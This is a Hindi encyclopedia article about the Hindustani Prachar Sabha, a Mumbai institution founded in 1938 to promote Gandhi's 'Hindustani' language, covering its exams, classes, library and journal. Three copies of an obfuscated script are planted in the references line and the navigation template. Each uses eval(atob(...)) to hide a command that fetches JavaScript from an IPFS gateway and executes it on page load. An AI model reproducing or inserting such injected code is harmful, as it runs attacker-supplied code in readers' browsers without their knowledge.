हिन्दुस्तानी प्रचार सभा महाराष्ट्र राज्य के मुम्बई नगर में स्थित एक हिंदी सेवी संस्था है।
स्थापना
सन् 1938 में राष्ट्रपिता महात्मा गांधी जी की प्रेरणा और आशीर्वाद से हिन्दुस्तानी प्रचार सभा की स्थापना बंबई में हुई। गांधीजी भारत की ऐसी राष्ट्रभाषा चाहते थे, जिसे आम जनता आसानी से समझ सके और जो नागरी और उर्दू दोनों लिपियों में लिखी जाए तथा हिन्दी और उर्दू दोनों के मिश्रण से बनी हो। ऐसी भाषा को महात्माजी ‘हिन्दुस्तानी’ कहते थे।
विशेषताएँ
- सभा की परिक्षाएँ साल में दो बार (फरवरी और सितंबर) में ली जाती है। परीक्षाओं के नाम हैं: लिखावट, प्रवेश, परिचय, पहली, दूसरी, तीसरी, काबिल और विद्वान। अंतिम तीन परीक्षाओं को केंद्रीय सरकार से क्रमश: हाई स्कूल, इंटर तथा बी. ए. के हिन्दी स्तर के समकक्ष मान्यता प्राप्त है।
- अब तक इसमें लगभग दो लाख विद्यार्थियों ने हिन्दुस्तानी की शिक्षा प्राप्त की है।
- हिन्दुस्तानी प्रचार सभा के नि:शुल्क वर्ग हाई स्कूलों और म्युनिसिपल स्कूलों में स्थान-स्थान पर चलाए जाते हैं।
- उर्दू लिपि न जानने वालों के लिए सभा नि:शुल्क रूप में विशेष कक्षाएँ चलती है।
- हिन्दुस्तानी प्रचार सभा का एक भाग ‘महात्मा गांधी मैमोरियल रिसर्च सेंटर और लायब्रेरी’ भी है।
- इस समय पुस्तकालय में 20563 पुस्तकें हैं। ये पुस्तकें हिन्दी, उर्दू और फ़ारसी साहित्य और भाषाविज्ञान संबंधी हैं। पुस्तकालय में हिन्दी, उर्दू और भाषाशास्त्र से संबंधित लगभग 2000 पत्रिकाओं के प्राचीन संस्करण मौजूद हैं।
- रिसर्च सेंटर ‘हिन्दुस्तानी जबान’ नाम से एक त्रैमासिक द्विभाषी अनुसंधान पत्रिका का प्रकाशन करता है। यह पत्रिका हिन्दी-उर्दू दोनों भाषाओं तथा लिपियों का रूप सामने रखती हुई हिन्दुस्तानी भाषा के मिलेजुले स्वरूप को उजागर करने का प्रयास करती है। इस क्षेत्र में रिसर्च सेंटर ने जो विशेष काम किया है वह ‘हिन्दुस्तानी जबान’ का अमीर ख़ुसरो (जुलाई-अक्टूबर, 1976) विशेषांक है।
[1]
टीका टिप्पणी और संदर्भ
- ↑
लोंढे, शंकरराव। हिन्दी की स्वैच्छिक संस्थाएँ (हिंदी) भारतकोश। अभिगमन तिथि: 29 मार्च, 2014।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
बाहरी कड़ियाँ
संबंधित लेख
[[Template:हिन्दी प्रचार समिति एवं संस्थाएँ<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>|देखें]] • [[|वार्ता]] • [{{fullurl:Template:हिन्दी प्रचार समिति एवं संस्थाएँ<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>|action=edit}}बदलें] हिन्दी प्रचार समिति एवं संस्थाएँ |
---|
|
नागरी प्रचारिणी सभा · हिन्दी साहित्य सम्मेलन, प्रयाग · ओडिशा राष्ट्रभाषा परिषद, पुरी · मध्यभारत हिन्दी साहित्य समिति, इन्दौर · अखिल भारतीय हिन्दी साहित्य सम्मेलन · अखिल भारतीय साहित्य परिषद · दक्षिण भारत हिन्दी प्रचार सभा · महाराष्ट्र राज्य हिन्दी साहित्य अकादमी · राष्ट्रभाषा प्रचार समिति, वर्धा · नागरी लिपि परिषद् · महात्मा गांधी अन्तरराष्ट्रीय हिन्दी विश्वविद्यालय · हिन्दी कम्प्यूटिंग फाउंडेशन · हिन्दी विद्यापीठ, देवघर · महाराष्ट्र राष्ट्रभाषा सभा, पुणे · हिन्दी प्रचार सभा, हैदराबाद · बंबई हिन्दी विद्यापीठ · गुजरात विद्यापीठ, अहमदाबाद · असम राष्ट्रभाषा प्रचार समिति, गुवाहाटी · श्री मध्य भारत हिंदी साहित्य समिति · हिन्दुस्तानी प्रचार सभा, बंबई · मैसूर हिन्दी प्रचार परिषद, बेंगलूर · केरल हिन्दी प्रचार सभा, तिरुवनंतपुरम · मणिपुर हिन्दी परिषद, इम्फाल · कर्नाटक महिला हिन्दी सेवा समिति, बेंगलूर · मैसूर रियासत हिन्दी प्रचार समिति, बेंगलूर · सौराष्ट्र हिन्दी प्रचार समिति, राजकोट · राष्ट्रभाषा महासंघ, मुंबई · विदर्भ हिन्दी साहित्य सम्मेलन, नागपुर · हिन्दी अकादमी, दिल्ली · सृजन सम्मान, छत्तीसगढ़ · अखिल भारतीय राष्ट्रभाषा विकास संगठन, गाजियाबाद · अखिल भारतीय हिन्दी संस्था संघ, दिल्ली · हिन्दी सेवी महासंघ, इंदौर · राष्ट्रभाषा प्रचार नवयुवक समिति, हैदराबाद · उत्तर प्रदेश हिन्दी संस्थान, लखनऊ · भारतीय भाषा न्यास, मुंबई · हिन्दी साहित्य सरिता मंच, नासिक · राजस्थानी जागृति समिति, हैदराबाद · हिन्दी प्रेमी समिति, हैदराबाद · छत्तीसगढ़ राष्ट्रभाषा प्रचार समिति · भारतीय भाषा परिषद, कोलकाता· हिन्दी भवन, नई दिल्ली · हिन्दी प्रचार सभा, मथुरा · राष्ट्रभाषा विचार मंच, अम्बाला · अखिल भारतीय भाषा साहित्य सम्मेलन · हिन्दी साहित्य समिति, भरतपुर · कर्नाटक हिन्दी प्रचार समिति, बेंगलूर |
|